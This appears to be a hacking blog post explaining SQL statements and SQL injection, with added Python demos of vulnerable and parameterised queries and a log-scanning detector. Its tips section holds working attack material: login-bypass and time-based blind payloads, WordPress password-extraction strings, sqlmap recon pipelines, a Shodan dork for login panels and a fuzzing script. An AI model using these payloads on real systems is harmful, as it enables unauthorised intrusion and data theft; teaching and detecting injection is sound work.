SQL injection (Structured Query Language injection, SQLi) is one of the most widespread and severe vulnerabilities on the Internet.
It is carried out with malicious input that can be used to bypass the security features of the system behind the application.
Once in, an attacker has wide freedom to read and manipulate the website's data, structure and content, and can potentially gain complete control over it.
A further problem with SQL injection is that it is difficult to detect and stop at the moment it is being exploited.
Discovering a SQL injection vulnerability in your own site is alarming, because it lets an attacker directly access, and potentially compromise, the underlying data.
In this article I'll show you what SQL injection is and how to locate it.
What is SQL injection?
This attack consists of inserting, or "injecting", SQL into a query via the input data sent from the client to the application.
It allows an attacker to view data that they are not normally able to retrieve.
This might include data belonging to other users, or any other data that the application itself is able to access.
In many cases, attackers can modify or delete this data, causing persistent changes to the application's content or behaviour.
Basic SQL Statements
SELECT - The most basic statement in SQL; almost every other command is used together with it. Use SELECT when you want to read data from the database.
Example 1: SELECT * FROM table;
Here SELECT * means you want every column, and FROM table names the table (table is the table's name) you want to read from.
Example 2: SELECT age, name FROM Class_details;
Here you get only the age and name columns from the Class_details table.
WHERE - Does what it sounds like: it filters the rows that are returned. Also a basic statement in SQL.
Example: SELECT name, age FROM Class_details WHERE age < 10;
This returns the name and age columns, but only for the rows whose age is less than 10.
ORDER BY - Sorts the results in ascending or descending order. Use ASC for ascending and DESC for descending.
Example: SELECT name, age FROM Class_details ORDER BY age;
Write ASC or DESC after age: with ASC the results start from the lowest age, with DESC from the highest.
UNION - Combines the rows of two SELECT queries into one result.
Example: SELECT age, name FROM Class1_details UNION SELECT age, name FROM Class2_details;
This returns the rows from both tables with duplicate rows removed; use UNION ALL to keep all rows, duplicates included.
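To see the four statements run against real data, here is an added example (not from the original post) that builds two small class tables in an in-memory SQLite database with constructed names and ages, then runs each statement from the list above. The UNION versus UNION ALL difference is visible because one pupil appears in both classes.

```python
import sqlite3


def build_class_db():
    """Constructed sample data for the two classes used in the page's examples."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Class1_details (name TEXT, age INTEGER)")
    con.execute("CREATE TABLE Class2_details (name TEXT, age INTEGER)")
    con.executemany("INSERT INTO Class1_details VALUES (?, ?)",
                    [("Asha", 9), ("Ben", 11), ("Chen", 8)])
    con.executemany("INSERT INTO Class2_details VALUES (?, ?)",
                    [("Ben", 11), ("Dara", 10)])        # Ben is in both classes
    return con


def select_all(con):
    # SELECT *: every column of every row
    return con.execute("SELECT * FROM Class1_details").fetchall()


def select_where(con):
    # WHERE keeps only the rows whose age is below 10
    return con.execute("SELECT name, age FROM Class1_details WHERE age < 10").fetchall()


def select_ordered(con, descending=False):
    # ORDER BY age ASC puts the youngest first, DESC the oldest first.
    # The direction is chosen from two fixed words here, never taken from user input.
    direction = "DESC" if descending else "ASC"
    return con.execute(
        f"SELECT name, age FROM Class1_details ORDER BY age {direction}").fetchall()


def union_rows(con, keep_duplicates=False):
    # UNION merges both result sets and drops duplicate rows; UNION ALL keeps them.
    # ORDER BY on the compound query makes the output order deterministic.
    op = "UNION ALL" if keep_duplicates else "UNION"
    return con.execute(
        f"SELECT age, name FROM Class1_details {op} "
        f"SELECT age, name FROM Class2_details ORDER BY age, name").fetchall()


if __name__ == "__main__":
    db = build_class_db()
    print("all:      ", select_all(db))
    print("age < 10: ", select_where(db))
    print("ordered:  ", select_ordered(db))
    print("union:    ", union_rows(db))
    print("union all:", union_rows(db, keep_duplicates=True))
```

Run it as a script to print each result set; UNION returns four rows while UNION ALL returns five, because Ben's row is kept twice.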
How to test for SQL Injection
Example 1:
Let's take the query SELECT * FROM Table WHERE id='1';
What this query says is: select all the data from Table for the row whose id is 1.
Now let's understand what we do to test for SQL injection. The idea is to check whether characters we supply end up inside the SQL text:
if we use ' the query becomes invalid (false), and if we use '' it stays valid (true);
if we use " the query becomes invalid (false), and if we use "" it stays valid (true);
if we use \ the query becomes invalid (false), and if we use \\ it stays valid (true).
If "true" and "false" are still a bit confusing, you will see what they mean in a moment.
When testing a website we usually only see a parameter such as id (or whatever else you know about the site), so that is where we put these characters.
Let's say the URL is
www.website.com?id=1
and the query behind it is SELECT * FROM Table WHERE id='1';
To test it we request
www.website.com?id=1'
or
www.website.com?id=1"
or
www.website.com?id=1\
so the queries become
SELECT * FROM Table WHERE id='1'';
SELECT * FROM Table WHERE id='1'";
SELECT * FROM Table WHERE id='1'\;
To use another SQL statement you have to complete the query first, for example
SELECT * FROM Table WHERE id='1''';
or you can use
SELECT * FROM Table WHERE id='1''''''''''''UNION SELECT '2';
which may return the data for id 2.
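The "true or false" behaviour above comes from how the database parses string literals: a single ' opens or closes a literal, and '' inside a literal is an escaped quote. The following added example (not part of the original post) makes that visible with a small quote scanner, then runs the page's id lookup against an in-memory SQLite table in two forms: the vulnerable form that pastes the parameter into the query text, and the parameterised form that sends the value separately. The Items table and its rows are constructed for the demo.

```python
import sqlite3


def string_literal_open(sql: str) -> bool:
    """True if `sql` ends inside an unterminated single-quoted literal.

    A lone ' opens or closes a literal; inside a literal '' is an escaped quote.
    This is exactly the page's observation that ' is "false" and '' is "true".
    """
    in_string = False
    i = 0
    while i < len(sql):
        if sql[i] == "'":
            if in_string and sql[i + 1:i + 2] == "'":
                i += 2                  # escaped quote: the literal stays open
                continue
            in_string = not in_string
        i += 1
    return in_string


def items_db():
    """Constructed table standing in for the page's `Table` with ids 1 and 2."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Items (id TEXT PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO Items VALUES (?, ?)",
                    [("1", "first"), ("2", "second")])
    return con


def lookup_concat(con, raw_id):
    """Vulnerable pattern: the URL parameter is pasted straight into the SQL text."""
    sql = f"SELECT * FROM Items WHERE id='{raw_id}';"
    try:
        return ("ok", con.execute(sql).fetchall())
    except sqlite3.OperationalError as exc:   # a stray quote breaks the statement
        return ("error", str(exc))


def lookup_param(con, raw_id):
    """Hardened pattern: the driver binds the value, so quotes in it are only data."""
    return ("ok", con.execute("SELECT * FROM Items WHERE id=?;", (raw_id,)).fetchall())


if __name__ == "__main__":
    for probe in ("1", "1'", "1''"):
        print(repr(probe), "concat:", lookup_concat(items_db(), probe),
              "| param:", lookup_param(items_db(), probe))
```

With concatenation the probe 1' raises a syntax error (the attacker's signal that quotes reach the parser), 1'' runs but matches nothing because the literal is now the two characters 1', and a parameterised lookup of 1' simply returns no rows with no error.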
Example 2:
Now let's assume there is a login portal and you know neither the password nor the username. What we do here is as follows.
Let's look at its query:
SELECT * FROM Users WHERE username = 'correct_username' AND password = 'correct_password';
What we as a hacker do is comment out the password part.
If you know programming, you know that whatever follows a comment marker is ignored when the code is compiled; we do the same to fool the database.
The query we want to run is
SELECT * FROM Users WHERE username = '' OR 1=1#' AND password = '';
Here everything after # is a comment and is ignored when the query is read.
We inject this through a login form that asks for a username and password:
Username :
Password:
What we enter is
Username : anything' OR 1=1#'
Password : anything
The query above now runs and we bypass the login portal.
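The following added example (not from the original post) reproduces the login bypass against a constructed Users table in SQLite and shows the fix beside it. SQLite does not treat # as a comment, so the same payload is written with the -- comment the page also lists; the Users table stores plaintext passwords only because the page's query compares them that way, and in a real application the password column would hold salted hashes.

```python
import sqlite3


def users_db():
    """Constructed Users table matching the shape of the page's login query."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)")
    con.executemany("INSERT INTO Users (username, password) VALUES (?, ?)",
                    [("admin", "s3cret"), ("alice", "hunter2")])
    return con


def login_vulnerable(con, username, password):
    """The page's query built by string concatenation: what the user types becomes SQL."""
    sql = (f"SELECT id, username FROM Users "
           f"WHERE username = '{username}' AND password = '{password}';")
    return con.execute(sql).fetchone()


def login_safe(con, username, password):
    """Same query with bound parameters: the quote and comment marker stay inside the data."""
    return con.execute(
        "SELECT id, username FROM Users WHERE username = ? AND password = ?;",
        (username, password)).fetchone()


# The page's payload with SQLite's -- line comment in place of MySQL's #.
BYPASS_USERNAME = "anything' OR 1=1-- "


if __name__ == "__main__":
    print("vulnerable, real creds :", login_vulnerable(users_db(), "alice", "hunter2"))
    print("vulnerable, bypass     :", login_vulnerable(users_db(), BYPASS_USERNAME, "anything"))
    print("safe, bypass           :", login_safe(users_db(), BYPASS_USERNAME, "anything"))
    print("safe, real creds       :", login_safe(users_db(), "alice", "hunter2"))
```

In the vulnerable version the WHERE clause collapses to username = 'anything' OR 1=1, which is true for every row, so the first user (admin) is returned without any password check; the parameterised version compares the literal string anything' OR 1=1-- against the username column and returns nothing.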
Other comment sequences are:
#      Hash comment
/*     C-style comment
-- -   SQL comment
;%00   Null byte
`      Backtick
Some tips for finding SQL injection
Using sqlmap and injecting through a header (the * is sqlmap's injection marker):
sqlmap -u "http://website.com" --header="X-Forwarded-For: 1*" --dbs --batch --random-agent --threads=10
Time-based SQLi payload:
'%2b(select*from(select(sleep(20)))a)%2b'
Using Shodan: search with the dork org:"TARGET" http.title:"login" and try the bypass admin' or 1=1
Another sqlmap pipeline:
findomain -t http://website.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1
Using the header X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'
Another one-liner:
subfinder -d website.com -silent -all | gau --blacklist ttf,woff,svg,png | sort -u | gf sqli > sqli.txt; sqlmap -m sqli.txt --batch --risk 3 --random-agent | tee -a sqli_report.txt
Another payload: 0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
Other payloads:
+OR+1=insert(1,1,1,1)--
+OR+1=replace(1,1,1)--
{`foo`/*bar*/(select+1)\}'
{`foo`/*bar*/(select%2b2)}
{`foo`/*bar*/(select+1+from+wp_users+where+user_pass+rlike+"(^)[$].*"+limit+1)}
Use Logsensor to discover login panels and test POST forms for SQLi.
Script I use:
#!/bin/bash
# $1 is a file of URLs with query strings. Each blind-SQLi payload from the wordlist is
# substituted into every parameter (qsreplace); ffuf then reports only the responses that
# took 5 seconds or longer (-ft "<5000" filters out the faster ones), i.e. the time-delay hits.
mkdir -p sql_script_results
while IFS= read -r payload; do
    grep "=" "$1" | qsreplace "$payload" > sqli
    ffuf -u FUZZ -w sqli -s -ft "<5000" | tee -a sql_script_results/vulnSqli.txt
    rm -f sqli
done < "Sql injection/BlindSQLi.fuzzdb_seclists.txt"
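Seen from the other side, the comment sequences listed earlier and the payloads in these tips are also what a defender looks for in web server logs. The following added example (not part of the original post) scans constructed access-log lines for the page's own signatures: the stray-quote probe, the OR 1=1 tautology, UNION SELECT, the comment markers, the null byte, and the sleep()/now()=sysdate() time-delay payloads. It assumes a combined log format extended with a trailing quoted X-Forwarded-For field, since the header-based payloads are only visible if that header is logged; the log format, the IP addresses and the requests are all made up for the demo.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Combined log format plus one extra quoted field for X-Forwarded-For (an assumed custom
# LogFormat; without it the header payloads from the page never reach the log).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<xff>[^"]*)"$')

# Signatures taken from the probes, comment markers and payloads shown on this page.
INDICATORS = {
    "tautology":     re.compile(r"'\s*(or|xor|and)\s+\d+\s*=\s*\d+", re.I),   # ' OR 1=1
    "union_select":  re.compile(r"union\s+(all\s+)?select", re.I),
    "time_delay":    re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "sysdate_trick": re.compile(r"now\(\)\s*=\s*sysdate\(\)", re.I),
    "comment":       re.compile(r"(--|#|/\*)"),
    "null_byte":     re.compile(r"\x00"),
}


def decode(value):
    # Decode twice so double-encoded probes (%2527 -> %27 -> ') are seen as the database would.
    return unquote_plus(unquote_plus(value))


def scan_text(text):
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def scan_line(line):
    """Return the set of indicator names found in one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    hits = set()
    for _key, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        value = decode(value)
        hits |= scan_text(value)
        # The page's first probe is a single stray quote: an odd number of quotes in one
        # parameter is a cheap, low-confidence signal of that probe (watch for names like O'Brien).
        if value.count("'") % 2 == 1:
            hits.add("unbalanced_quote")
    hits |= scan_text(decode(m["xff"]))
    return hits


def scan_log(lines):
    """Map each suspicious line's index to its sorted indicator list (clean lines are omitted)."""
    report = {}
    for idx, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            report[idx] = sorted(hits)
    return report


# Constructed sample lines; the requests mirror the page's probes and header payload.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /item?id=12 HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /item?id=1%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0" "-"',
    '203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /item?id=1%27%20OR%201%3D1%23 HTTP/1.1" 200 4096 "-" "Mozilla/5.0" "-"',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /login HTTP/1.1" 200 1024 "-" "curl/8.0" "0\'XOR(if(now()=sysdate(),sleep(10),0))XOR\'"',
]

if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG).items():
        print(idx, hits)
```

The benign request for id=12 produces no hits; the 1' probe is flagged only by the quote-parity check (and, in a real log, by the 500 status that often follows it); the login-bypass string trips the tautology and comment signatures; and the X-Forwarded-For payload is caught through the header field even though the request path looks harmless.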
So that is it for today, guys.
I hope you all liked the blog. If so, comment down below, and if you find any vuln please let me know; I will be very happy to hear about it. If you want to see more blogs like this, leave a comment.
If you want to write your own blog here, you can contact me.
We will meet in another blog.
Till then,
take care and happy hacking.